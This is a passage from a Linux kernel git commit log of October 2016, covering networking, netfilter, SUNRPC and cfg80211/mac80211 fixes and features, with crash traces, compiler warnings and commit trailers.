added return values to protocol hash functions and
commit 496611d7b5 ("inet: create IPv6-equivalent inet_hash function")
implemented a new hash function for IPv6.  However, the latter does
not respect the former's convention.

This properly propagates the hash errors in the IPv6 case.

Fixes: 496611d7b5 ("inet: create IPv6-equivalent inet_hash function")
Reported-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: Craig Gallek <kraig@google.com>
Acked-by: Soheil Hassas Yeganeh <soheil@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 12:01:49 -04:00
Marcelo Ricardo Leitner
bf911e985d sctp: validate chunk len before actually using it
Andrey Konovalov reported that KASAN detected that SCTP was using a slab
beyond the boundaries. It was caused because when handling out of the
blue packets in function sctp_sf_ootb() it was checking the chunk len
only after already processing the first chunk, validating only for the
2nd and subsequent ones.

The fix is to just move the check upwards so it's also validated for the
1st chunk.

Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-29 12:00:10 -04:00
Jeff Layton
18e601d6ad sunrpc: fix some missing rq_rbuffer assignments
We've been seeing some crashes in testing that look like this:

BUG: unable to handle kernel NULL pointer dereference at           (null)
IP: [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
PGD 212ca2067 PUD 212ca3067 PMD 0
Oops: 0002 [#1] SMP
Modules linked in: rpcsec_gss_krb5 nfsv4 dns_resolver nfs fscache ppdev parport_pc i2c_piix4 sg parport i2c_core virtio_balloon pcspkr acpi_cpufreq nfsd auth_rpcgss nfs_acl lockd grace sunrpc ip_tables xfs libcrc32c sd_mod ata_generic pata_acpi virtio_scsi 8139too ata_piix libata 8139cp mii virtio_pci floppy virtio_ring serio_raw virtio
CPU: 1 PID: 1540 Comm: nfsd Not tainted 4.9.0-rc1 #39
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2007
task: ffff88020d7ed200 task.stack: ffff880211838000
RIP: 0010:[<ffffffff8135ce99>]  [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
RSP: 0018:ffff88021183bdd0  EFLAGS: 00010206
RAX: 0000000000000000 RBX: ffff88020d7fa000 RCX: 000000f400000000
RDX: 0000000000000014 RSI: ffff880212927020 RDI: 0000000000000000
RBP: ffff88021183be30 R08: 01000000ef896996 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff880211704ca8
R13: ffff88021473f000 R14: 00000000ef896996 R15: ffff880211704800
FS:  0000000000000000(0000) GS:ffff88021fc80000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000212ca1000 CR4: 00000000000006e0
Stack:
 ffffffffa01ea087 ffffffff63400001 ffff880215145e00 ffff880211bacd00
 ffff88021473f2b8 0000000000000004 00000000d0679d67 ffff880211bacd00
 ffff88020d7fa000 ffff88021473f000 0000000000000000 ffff88020d7faa30
Call Trace:
 [<ffffffffa01ea087>] ? svc_tcp_recvfrom+0x5a7/0x790 [sunrpc]
 [<ffffffffa01f84d8>] svc_recv+0xad8/0xbd0 [sunrpc]
 [<ffffffffa0262d5e>] nfsd+0xde/0x160 [nfsd]
 [<ffffffffa0262c80>] ? nfsd_destroy+0x60/0x60 [nfsd]
 [<ffffffff810a9418>] kthread+0xd8/0xf0
 [<ffffffff816dbdbf>] ret_from_fork+0x1f/0x40
 [<ffffffff810a9340>] ? kthread_park+0x60/0x60
Code: 00 00 48 89 f8 48 83 fa 20 72 7e 40 38 fe 7c 35 48 83 ea 20 48 83 ea 20 4c 8b 06 4c 8b 4e 08 4c 8b 56 10 4c 8b 5e 18 48 8d 76 20 <4c> 89 07 4c 89 4f 08 4c 89 57 10 4c 89 5f 18 48 8d 7f 20 73 d4
RIP  [<ffffffff8135ce99>] memcpy_orig+0x29/0x110
 RSP <ffff88021183bdd0>
CR2: 0000000000000000

Both Bruce and Eryu ran a bisect here and found that the problematic
patch was 68778945e4 (SUNRPC: Separate buffer pointers for RPC Call and
Reply messages).

That patch changed rpc_xdr_encode to use a new rq_rbuffer pointer to
set up the receive buffer, but didn't change all of the necessary
codepaths to set it properly. In particular the backchannel setup was
missing.

We need to set rq_rbuffer whenever rq_buffer is set. Ensure that it is.

Reviewed-by: Chuck Lever <chuck.lever@oracle.com>
Tested-by: Chuck Lever <chuck.lever@oracle.com>
Reported-by: Eryu Guan <guaneryu@gmail.com>
Tested-by: Eryu Guan <guaneryu@gmail.com>
Fixes: 68778945e4 "SUNRPC: Separate buffer pointers..."
Reported-by: J. Bruce Fields <bfields@fieldses.org>
Signed-off-by: Jeff Layton <jlayton@redhat.com>
Signed-off-by: J. Bruce Fields <bfields@redhat.com>
2016-10-28 16:57:33 -04:00
Colin Ian King
b09edbd07f net caif: insert missing spaces in pr_* messages and unbreak multi-line strings
Some of the pr_* messages are missing spaces, so insert these and also
unbreak multi-line literal strings in pr_* messages

Signed-off-by: Colin Ian King <colin.king@canonical.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-28 13:47:33 -04:00
David S. Miller
1d00578836 Merge branch 'master' of git://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next
Steffen Klassert says:

====================
pull request (net-next): ipsec-next 2016-10-25

Just a leftover from the last development cycle.

1) Remove some unused code, from Florian Westphal.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-28 13:26:27 -04:00
Arnd Bergmann
5747620257 netfilter: ip_vs_sync: fix bogus maybe-uninitialized warning
Building the ip_vs_sync code with CONFIG_OPTIMIZE_INLINING on x86
confuses the compiler to the point where it produces a rather
dubious warning message:

net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
  struct ip_vs_sync_conn_options opt;
                                 ^~~
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘opt.previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).init_seq’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]
net/netfilter/ipvs/ip_vs_sync.c:1073:33: error: ‘*((void *)&opt+12).previous_delta’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

The problem appears to be a combination of a number of factors, including
the __builtin_bswap32 compiler builtin being slightly odd, having a large
amount of code inlined into a single function, and the way that some
functions only get partially inlined here.

I've spent way too much time trying to work out a way to improve the
code, but the best I've come up with is to add an explicit memset
right before the ip_vs_seq structure is first initialized here. When
the compiler works correctly, this has absolutely no effect, but in the
case that produces the warning, the warning disappears.

In the process of analysing this warning, I also noticed that
we use memcpy to copy the larger ip_vs_sync_conn_options structure
over two members of the ip_vs_conn structure. This works because
the layout is identical, but seems error-prone, so I'm changing
this in the process to directly copy the two members. This change
seemed to have no effect on the object code or the warning, but
it deals with the same data, so I kept the two changes together.

Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Julian Anastasov <ja@ssi.bg>
Signed-off-by: Simon Horman <horms@verge.net.au>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-28 14:14:51 +02:00
Arnd Bergmann
514877182b mac80211: fils_aead: fix encrypt error handling
gcc -Wmaybe-uninitialized reports a bug in aes_siv_encryp:

net/mac80211/fils_aead.c: In function ‘aes_siv_encrypt.constprop’:
net/mac80211/fils_aead.c:84:26: error: ‘tfm2’ may be used uninitialized in this function [-Werror=maybe-uninitialized]

At the time that the memory allocation fails, 'tfm2' has not been
allocated, so we should not attempt to free it later, and we can
simply return an error.

Fixes: 39404feee6 ("mac80211: FILS AEAD protection for station mode association frames")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-28 12:59:12 +02:00
Andrey Vagin
002d8a1a6c net: skip genenerating uevents for network namespaces that are exiting
No one can see these events, because a network namespace can not be
destroyed, if it has sockets.

Unlike other devices, uevent-s for network devices are generated
only inside their network namespaces. They are filtered in
kobj_bcast_filter()

My experiments shows that net namespaces are destroyed more 30% faster
with this optimization.

Here is a perf output for destroying network namespaces without this
patch.

-   94.76%     0.02%  kworker/u48:1  [kernel.kallsyms]     [k] cleanup_net
   - 94.74% cleanup_net
      - 94.64% ops_exit_list.isra.4
         - 41.61% default_device_exit_batch
            - 41.47% unregister_netdevice_many
               - rollback_registered_many
                  - 40.36% netdev_unregister_kobject
                     - 14.55% device_del
                        + 13.71% kobject_uevent
                     - 13.04% netdev_queue_update_kobjects
                        + 12.96% kobject_put
                     - 12.72% net_rx_queue_update_kobjects
                          kobject_put
                        - kobject_release
                           + 12.69% kobject_uevent
                  + 0.80% call_netdevice_notifiers_info
         + 19.57% nfsd_exit_net
         + 11.15% tcp_net_metrics_exit
         + 8.25% rpcsec_gss_exit_net

It's very critical to optimize the exit path for network namespaces,
because they are destroyed under net_mutex and many namespaces can be
destroyed for one iteration.

v2: use dev_set_uevent_suppress()

Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: Eric W. Biederman <ebiederm@xmission.com>
Signed-off-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 17:14:47 -04:00
Jamal Hadi Salim
9ee7837449 net sched filters: fix notification of filter delete with proper handle
Daniel says:

While trying out [1][2], I noticed that tc monitor doesn't show the
correct handle on delete:

$ tc monitor
qdisc clsact ffff: dev eno1 parent ffff:fff1
filter dev eno1 ingress protocol all pref 49152 bpf handle 0x2a [...]
deleted filter dev eno1 ingress protocol all pref 49152 bpf handle 0xf3be0c80

some context to explain the above:
The user identity of any tc filter is represented by a 32-bit
identifier encoded in tcm->tcm_handle. Example 0x2a in the bpf filter
above. A user wishing to delete, get or even modify a specific filter
uses this handle to reference it.
Every classifier is free to provide its own semantics for the 32 bit handle.
Example: classifiers like u32 use schemes like 800:1:801 to describe
the semantics of their filters represented as hash table, bucket and
node ids etc.
Classifiers also have internal per-filter representation which is different
from this externally visible identity. Most classifiers set this
internal representation to be a pointer address (which allows fast retrieval
of said filters in their implementations). This internal representation
is referenced with the "fh" variable in the kernel control code.

When a user successfuly deletes a specific filter, by specifying the correct
tcm->tcm_handle, an event is generated to user space which indicates
which specific filter was deleted.

Before this patch, the "fh" value was sent to user space as the identity.
As an example what is shown in the sample bpf filter delete event above
is 0xf3be0c80. This is infact a 32-bit truncation of 0xffff8807f3be0c80
which happens to be a 64-bit memory address of the internal filter
representation (address of the corresponding filter's struct cls_bpf_prog);

After this patch the appropriate user identifiable handle as encoded
in the originating request tcm->tcm_handle is generated in the event.
One of the cardinal rules of netlink rules is to be able to take an
event (such as a delete in this case) and reflect it back to the
kernel and successfully delete the filter. This patch achieves that.

Note, this issue has existed since the original TC action
infrastructure code patch back in 2004 as found in:
https://git.kernel.org/cgit/linux/kernel/git/history/history.git/commit/

[1] http://patchwork.ozlabs.org/patch/682828/
[2] http://patchwork.ozlabs.org/patch/682829/

Fixes: 4e54c4816bfe ("[NET]: Add tc extensions infrastructure.")
Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 17:12:33 -04:00
Arnd Bergmann
bc72f3dd89 flow_dissector: fix vlan tag handling
gcc warns about an uninitialized pointer dereference in the vlan
priority handling:

net/core/flow_dissector.c: In function '__skb_flow_dissect':
net/core/flow_dissector.c:281:61: error: 'vlan' may be used uninitialized in this function [-Werror=maybe-uninitialized]

As pointed out by Jiri Pirko, the variable is never actually used
without being initialized first as the only way it end up uninitialized
is with skb_vlan_tag_present(skb)==true, and that means it does not
get accessed.

However, the warning hints at some related issues that I'm addressing
here:

- the second check for the vlan tag is different from the first one
  that tests the skb for being NULL first, causing both the warning
  and a possible NULL pointer dereference that was not entirely fixed.
- The same patch that introduced the NULL pointer check dropped an
  earlier optimization that skipped the repeated check of the
  protocol type
- The local '_vlan' variable is referenced through the 'vlan' pointer
  but the variable has gone out of scope by the time that it is
  accessed, causing undefined behavior

Caching the result of the 'skb && skb_vlan_tag_present(skb)' check
in a local variable allows the compiler to further optimize the
later check. With those changes, the warning also disappears.

Fixes: 3805a938a6 ("flow_dissector: Check skb for VLAN only if skb specified.")
Fixes: d5709f7ab7 ("flow_dissector: For stripped vlan, get vlan info from skb->vlan_tci")
Signed-off-by: Arnd Bergmann <arnd@arndb.de>
Acked-by: Jiri Pirko <jiri@mellanox.com>
Acked-by: Eric Garver <e@erig.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:36:03 -04:00
David Ahern
d5d32e4b76 net: ipv6: Do not consider link state for nexthop validation
Similar to IPv4, do not consider link state when validating next hops.

Currently, if the link is down default routes can fail to insert:
 $ ip -6 ro add vrf blue default via 2100:2::64 dev eth2
 RTNETLINK answers: No route to host

With this patch the command succeeds.

Fixes: 8c14586fc3 ("net: ipv6: Use passed in table for nexthop lookups")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:33:12 -04:00
David Ahern
830218c1ad net: ipv6: Fix processing of RAs in presence of VRF
rt6_add_route_info and rt6_add_dflt_router were updated to pull the FIB
table from the device index, but the corresponding rt6_get_route_info
and rt6_get_dflt_router functions were not leading to the failure to
process RA's:

    ICMPv6: RA: ndisc_router_discovery failed to add default route

Fix the 'get' functions by using the table id associated with the
device when applicable.

Also, now that default routes can be added to tables other than the
default table, rt6_purge_dflt_routers needs to be updated as well to
look at all tables. To handle that efficiently, add a flag to the table
denoting if it is has a default route via RA.

Fixes: ca254490c8 ("net: Add VRF support to IPv6 stack")
Signed-off-by: David Ahern <dsa@cumulusnetworks.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:30:52 -04:00
Johannes Berg
56989f6d85 genetlink: mark families as __ro_after_init
Now genl_register_family() is the only thing (other than the
users themselves, perhaps, but I didn't find any doing that)
writing to the family struct.

In all families that I found, genl_register_family() is only
called from __init functions (some indirectly, in which case
I've add __init annotations to clarifly things), so all can
actually be marked __ro_after_init.

This protects the data structure from accidental corruption.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
2ae0f17df1 genetlink: use idr to track families
Since generic netlink family IDs are small integers, allocated
densely, IDR is an ideal match for lookups. Replace the existing
hand-written hash-table with IDR for allocation and lookup.

This lets the families only be written to once, during register,
since the list_head can be removed and removal of a family won't
cause any writes.

It also slightly reduces the code size (by about 1.3k on x86-64).

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
489111e5c2 genetlink: statically initialize families
Instead of providing macros/inline functions to initialize
the families, make all users initialize them statically and
get rid of the macros.

This reduces the kernel code size by about 1.6k on x86-64
(with allyesconfig).

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
a07ea4d994 genetlink: no longer support using static family IDs
Static family IDs have never really been used, the only
use case was the workaround I introduced for those users
that assumed their family ID was also their multicast
group ID.

Additionally, because static family IDs would never be
reserved by the generic netlink code, using a relatively
low ID would only work for built-in families that can be
registered immediately after generic netlink is started,
which is basically only the control family (apart from
the workaround code, which I also had to add code for so
it would reserve those IDs)

Thus, anything other than GENL_ID_GENERATE is flawed and
luckily not used except in the cases I mentioned. Move
those workarounds into a few lines of code, and then get
rid of GENL_ID_GENERATE entirely, making it more robust.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:09 -04:00
Johannes Berg
c90c39dab3 genetlink: introduce and use genl_family_attrbuf()
This helper function allows family implementations to access
their family's attrbuf. This gets rid of the attrbuf usage
in families, and also adds locking validation, since it's not
valid to use the attrbuf with parallel_ops or outside of the
dumpit callback.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:16:08 -04:00
Antonio Quartulli
4fe77d82ef skbedit: allow the user to specify bitmask for mark
The user may want to use only some bits of the skb mark in
his skbedit rules because the remaining part might be used by
something else.

Introduce the "mask" parameter to the skbedit actor in order
to implement such functionality.

When the mask is specified, only those bits selected by the
latter are altered really changed by the actor, while the
rest is left untouched.

Signed-off-by: Antonio Quartulli <antonio@open-mesh.com>
Signed-off-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-27 16:07:25 -04:00
John W. Linville
f1d505bb76 netfilter: nf_tables: fix type mismatch with error return from nft_parse_u32_check
Commit 36b701fae1 ("netfilter: nf_tables: validate maximum value of
u32 netlink attributes") introduced nft_parse_u32_check with a return
value of "unsigned int", yet on error it returns "-ERANGE".

This patch corrects the mismatch by changing the return value to "int",
which happens to match the actual users of nft_parse_u32_check already.

Found by Coverity, CID 1373930.

Note that commit 21a9e0f156 ("netfilter: nft_exthdr: fix error
handling in nft_exthdr_init()) attempted to address the issue, but
did not address the return type of nft_parse_u32_check.

Signed-off-by: John W. Linville <linville@tuxdriver.com>
Cc: Laura Garcia Liebana <nevola@gmail.com>
Cc: Pablo Neira Ayuso <pablo@netfilter.org>
Cc: Dan Carpenter <dan.carpenter@oracle.com>
Fixes: 36b701fae1 ("netfilter: nf_tables: validate maximum value...")
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:29:01 +02:00
Ulrich Weber
444f901742 netfilter: nf_conntrack_sip: extend request line validation
on SIP requests, so a fragmented TCP SIP packet from an allow header starting with
 INVITE,NOTIFY,OPTIONS,REFER,REGISTER,UPDATE,SUBSCRIBE
 Content-Length: 0

will not bet interpreted as an INVITE request. Also Request-URI must start with an alphabetic character.

Confirm with RFC 3261
 Request-Line   =  Method SP Request-URI SP SIP-Version CRLF

Fixes: 30f33e6dee ("[NETFILTER]: nf_conntrack_sip: support method specific request/response handling")
Signed-off-by: Ulrich Weber <ulrich.weber@riverbed.com>
Acked-by: Marco Angaroni <marcoangaroni@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:27:59 +02:00
Liping Zhang
dab45060a5 netfilter: nf_tables: fix race when create new element in dynset
Packets may race when create the new element in nft_hash_update:
       CPU0                 CPU1
  lookup_fast - fail     lookup_fast - fail
       new - ok             new - ok
     insert - ok         insert - fail(EEXIST)

So when race happened, we reuse the existing element. Otherwise,
these *racing* packets will not be handled properly.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:22:02 +02:00
Liping Zhang
61f9e2924f netfilter: nf_tables: fix *leak* when expr clone fail
When nft_expr_clone failed, a series of problems will happen:

1. module refcnt will leak, we call __module_get at the beginning but
   we forget to put it back if ops->clone returns fail
2. memory will be leaked, if clone fail, we just return NULL and forget
   to free the alloced element
3. set->nelems will become incorrect when set->size is specified. If
   clone fail, we should decrease the set->nelems

Now this patch fixes these problems. And fortunately, clone fail will
only happen on counter expression when memory is exhausted.

Fixes: 086f332167 ("netfilter: nf_tables: add clone interface to expression operations")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:20:45 +02:00
Liping Zhang
bb6a6e8e09 netfilter: nft_dynset: fix panic if NFT_SET_HASH is not enabled
When CONFIG_NFT_SET_HASH is not enabled and I input the following rule:
"nft add rule filter output flow table test {ip daddr counter }", kernel
panic happened on my system:
 BUG: unable to handle kernel NULL pointer dereference at (null)
 IP: [<          (null)>]           (null)
 [...]
 Call Trace:
 [<ffffffffa0590466>] ? nft_dynset_eval+0x56/0x100 [nf_tables]
 [<ffffffffa05851bb>] nft_do_chain+0xfb/0x4e0 [nf_tables]
 [<ffffffffa0432f01>] ? nf_conntrack_tuple_taken+0x61/0x210 [nf_conntrack]
 [<ffffffffa0459ea6>] ? get_unique_tuple+0x136/0x560 [nf_nat]
 [<ffffffffa043bca1>] ? __nf_ct_ext_add_length+0x111/0x130 [nf_conntrack]
 [<ffffffffa045a357>] ? nf_nat_setup_info+0x87/0x3b0 [nf_nat]
 [<ffffffff81761e27>] ? ipt_do_table+0x327/0x610
 [<ffffffffa045a6d7>] ? __nf_nat_alloc_null_binding+0x57/0x80 [nf_nat]
 [<ffffffffa059f21f>] nft_ipv4_output+0xaf/0xd0 [nf_tables_ipv4]
 [<ffffffff81702515>] nf_iterate+0x55/0x60
 [<ffffffff81702593>] nf_hook_slow+0x73/0xd0

Because in rbtree type set, ops->update is not implemented. So just keep
it simple, in such case, report -EOPNOTSUPP to the user space.

Fixes: 22fe54d5fe ("netfilter: nf_tables: add support for dynamic set updates")
Signed-off-by: Liping Zhang <zlpnobody@gmail.com>
Signed-off-by: Pablo Neira Ayuso <pablo@netfilter.org>
2016-10-27 18:20:08 +02:00
vamsi krishna
088e8df82f cfg80211: Add support to update connection parameters
Add functionality to update the connection parameters when in connected
state, so that driver/firmware uses the updated parameters for
subsequent roaming. This is for drivers that support internal BSS
selection and roaming. The new command does not change the current
association state, i.e., it can be used to update IE contents for future
(re)associations without causing an immediate disassociation or
reassociation with the current BSS.

This commit implements the required functionality for updating IEs for
(Re)Association Request frame only. Other parameters can be added in
future when required.

Signed-off-by: vamsi krishna <vamsin@qti.qualcomm.com>
Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:28 +02:00
Johannes Berg
8ac6344865 cfg80211: handle fragmented IEs in splitting
The IEs "output" can sometimes combine IEs coming from userspace
with IEs generated in the kernel - in particular mac80211 does
this for association frames.

Add support in this code for the 802.11 IE fragmentation.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:27 +02:00
Michael Braun
ce0ce13a1c cfg80211: configure multicast to unicast for AP interfaces
Add the ability to configure if an AP (and associated VLANs) will
do multicast-to-unicast conversion for ARP, IPv4 and IPv6 frames
(possibly within 802.1Q). If enabled, such frames are to be sent
to each station separately, with the DA replaced by their own MAC
address rather than the group address.

Note that this may break certain expectations of the receiver,
such as the ability to drop unicast IP packets received within
multicast L2 frames, or the ability to not send ICMP destination
unreachable messages for packets received in L2 multicast (which
is required, but the receiver can't tell the difference if this
new option is enabled.)

This also doesn't implement the 802.11 DMS (directed multicast
service).

Signed-off-by: Michael Braun <michael-dev@fami-braun.de>
[fix disabling, add better documentation & commit message]
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:27 +02:00
Jouni Malinen
f3ca52aa52 mac80211: Claim Fast Initial Link Setup (FILS) STA support
With the previous commits, initial FILS authentication/association
support is now functional in mac80211-based drivers for station role
(and FILS AP case is covered by user space in hostapd withotu requiring
mac80211 changes).

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:26 +02:00
Jouni Malinen
39404feee6 mac80211: FILS AEAD protection for station mode association frames
This adds support for encrypting (Re)Association Request frame and
decryption (Re)Association Response frame when using FILS in station
mode.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:25 +02:00
Jouni Malinen
dbc0c2cb2f mac80211: Add FILS auth alg mapping
Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:25 +02:00
Jouni Malinen
348bd45669 cfg80211: Add KEK/nonces for FILS association frames
The new nl80211 attributes can be used to provide KEK and nonces to
allow the driver to encrypt and decrypt FILS (Re)Association
Request/Response frames in station mode.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:24 +02:00
Jouni Malinen
631810603a cfg80211: Add Fast Initial Link Setup (FILS) auth algs
This defines authentication algorithms for FILS (IEEE 802.11ai).

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:23 +02:00
Jouni Malinen
6ec63612c3 mac80211: Allow AUTH_DATA to be used for FILS
The special SAE case should be limited only for SAE since the more
generic AUTH_DATA can now be used with other authentication algorithms
as well.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:21 +02:00
Jouni Malinen
11b6b5a4ce cfg80211: Rename SAE_DATA to more generic AUTH_DATA
This adds defines and nl80211 extensions to allow FILS Authentication to
be implemented similarly to SAE. FILS does not need the special rules
for the Authentication transaction number and Status code fields, but it
does need to add non-IE fields. The previously used
NL80211_ATTR_SAE_DATA can be reused for this to avoid having to
duplicate that implementation. Rename that attribute to more generic
NL80211_ATTR_AUTH_DATA (with backwards compatibility define for
NL80211_SAE_DATA).

Also document the special rules related to the Authentication
transaction number and Status code fiels.

Signed-off-by: Jouni Malinen <jouni@qca.qualcomm.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:20 +02:00
Johannes Berg
bfe2c7b1cc nl80211: use nla_parse_nested() instead of nla_parse()
It's just an inline doing the same thing, but the code
is nicer with it.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:20 +02:00
Johannes Berg
1794899e8b nl80211: move unsplit command advertising to a separate function
When we split the wiphy dump because it got too large, I added a
comment and asked that all new command advertising be done only
for userspace clients capable of receiving split data, in order
to not break older ones (which can't use the new commands anyway)

This mostly worked, and we haven't added many new commands, but
I occasionally get patches that modify the wrong place.

Make this easier to detect and understand by splitting out the
old commands to a separate function that makes it more clear it
should never be modified again.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 16:03:19 +02:00
Johannes Berg
ac668afe41 mac80211: validate new interface's beacon intervals
As part of interface combination checking, verify any new
interface's beacon intervals. In fact, just always add the
beacon interval since that's harmless.

With this patch, mac80211 is prepared for drivers that set
the min_beacon_int_gcd parameter in interface combinations.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:18:07 +02:00
Johannes Berg
4c8dea638c cfg80211: validate beacon int as part of iface combinations
Remove the pointless checking against interface combinations in
the initial basic beacon interval validation, that currently isn't
taking into account radar detection or channels properly. Instead,
just validate the basic range there, and then delay real checking
to the interface combination validation that drivers must do.

This means that drivers wanting to use the beacon_int_min_gcd will
now have to pass the new_beacon_int when validating the AP/mesh
start.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:18:07 +02:00
Johannes Berg
56271da29c cfg80211: disallow beacon_int_min_gcd with IBSS
This can't really be supported right now, because the IBSS
interface may change its beacon interval at any time due to
joining another network; thus, there's already "support"
for different beacon intervals here, implicitly.

Until we figure out how we should handle this case (continue
to allow it to arbitrarily join? Join only if compatible?)
disallow advertising that different beacon intervals are
supported if IBSS is allowed.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:45 +02:00
Johannes Berg
275fcf62c2 cfg80211: mesh: track (and thus validate) beacon interval
This is needed for beacon interval validation; if we don't
store it, then new interfaces added won't validate that the
beacon interval is the same as existing ones. Fix this.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:45 +02:00
Johannes Berg
0507a3ac6e cfg80211: fix beacon interval in interface combination iteration
We shouldn't abort the iteration with an error when one of the
potential combinations can't accomodate the beacon interval
request, we should just skip that particular combination. Fix
the code to do so.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:44 +02:00
Arend Van Spriel
73c7da3dae cfg80211: add generic helper to check interface is running
Add a helper using wdev to check if interface is running. This
deals with both non-netdev and netdev interfaces. In struct
wireless_dev replace 'p2p_started' and 'nan_started' by
'is_running' as those are mutually exclusive anyway, and unify
all the code to use wdev_running().

Signed-off-by: Arend van Spriel <arend.vanspriel@broadcom.com>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:44 +02:00
Johannes Berg
8f20542386 wireless: deprecate WDS and disable by default
The old WDS 4-addr frame support is very limited, e.g.
 * no encryption is possible on such links
 * it cannot support rate/HT/VHT negotiation
 * management APIs are very restricted

These make the WDS legacy mode useless in practice.

All of these are resolved by the 4-addr AP/client support,
so there's also no reason to improve WDS in the future.

Therefore, add a Kconfig option to disable legacy WDS.
This gives people an "emergency valve" while they migrate
to the better-supported 4-addr AP/client option; we plan
to remove it (and the associated cfg80211/mac80211 code,
which is the ultimate goal) in the future.

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
2016-10-27 09:08:43 +02:00
Eric Dumazet
10df8e6152 udp: fix IP_CHECKSUM handling
First bug was added in commit ad6f939ab1 ("ip: Add offset parameter to
